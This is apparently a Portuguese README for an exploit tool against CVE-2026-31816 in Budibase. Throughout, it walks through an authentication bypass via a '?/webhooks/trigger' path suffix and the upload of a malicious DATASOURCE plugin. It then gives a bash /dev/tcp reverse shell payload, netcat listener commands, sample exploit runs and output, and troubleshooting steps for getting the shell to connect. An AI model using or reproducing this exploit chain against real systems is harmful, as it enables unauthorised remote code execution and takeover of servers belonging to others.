
Explora o CVE-2026-31816 no Budibase para contornar a autenticação, carregar um plugin de fonte de dados malicioso e executar um shell reverso para acesso remoto.
Esta ferramenta explora a CVE-2026-31816 para estabelecer uma conexão de reverse shell em um servidor Budibase alvo.
Cadeia de Ataque: Bypass de Autenticação → Upload de Plugin DATASOURCE → Execução de Código no Servidor → Reverse Shell
requests (pip install requests)# 1. Inicie o listener na máquina do atacante
nc -lvnp 4444
# 2. Execute o exploit (outro terminal)
python3 CVE-2026-31816-rshell.py -t http://target:10000 --lhost SEU_IP --lport 4444
| Parâmetro | Obrigatório | Descrição |
|---|---|---|
-t, --target | ✅ | URL do Budibase alvo |
--lhost | ✅ | Host do listener (seu IP) |
--lport | ❌ | Porta do listener (padrão: 4444) |
# IP do atacante: 192.168.1.100
# Budibase alvo: 192.168.1.128:10000
# Terminal 1 - Iniciar listener
nc -lvnp 4444
# Terminal 2 - Executar exploit
python3 CVE-2026-31816-rshell.py \
-t http://192.168.1.128:10000 \
--lhost 192.168.1.100 \
--lport 4444
GET /api/integrations?/webhooks/trigger
Se retornar 200, o alvo é vulnerável ao bypass de autenticação.
{
"type": "datasource",
"schema": { ... }
}
Plugins do tipo DATASOURCE executam código JavaScript no servidor.
// Executado quando o plugin é validado:
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'
POST /api/plugin/upload?/webhooks/trigger
Upload do plugin contornando a autenticação. O código é executado durante a validação.
┌─────────────┐ ┌─────────────┐ ┌─────────────┐
│ Atacante │ │ Alvo │ │ Listener │
│ │ │ Servidor │ │ (nc) │
│ │ │ │ │ │
│ exploit ────┼────►│ Upload │ │ │
│ │ │ Plugin │ │ │
│ │ │ Executar │────►│ Ouvir │
│ │ │ Código │◄────┤ Reverse │
│ │ │ │ │ Conectar │
└─────────────┘ └─────────────┘ └─────────────┘
============================================================
CVE-2026-31816 - Exploit de Reverse Shell
============================================================
[*] Alvo: http://192.168.1.128:10000
[*] Reverse shell: 192.168.1.100:4444
[*] Verificando vulnerabilidade...
[+] O alvo está vulnerável!
[*] Criando plugin de reverse shell direcionado a 192.168.1.100:4444
[*] Enviando plugin de reverse shell...
[*] Status: 200
[+] Plugin instalado com sucesso!
============================================================
[+] SUCESSO! Verifique seu listener!
============================================================
Causas possíveis:
Soluções:
# Verificar conectividade de rede
ping SEU_IP
# Verificar firewall
sudo ufw allow 4444/tcp
# Tentar porta diferente
nc -lvnp 8080
Causas possíveis:
Soluções:
# Testar manualmente se a vulnerabilidade existe
curl -s "http://target:10000/api/integrations?/webhooks/trigger"
# Se retornar JSON, a vulnerabilidade existe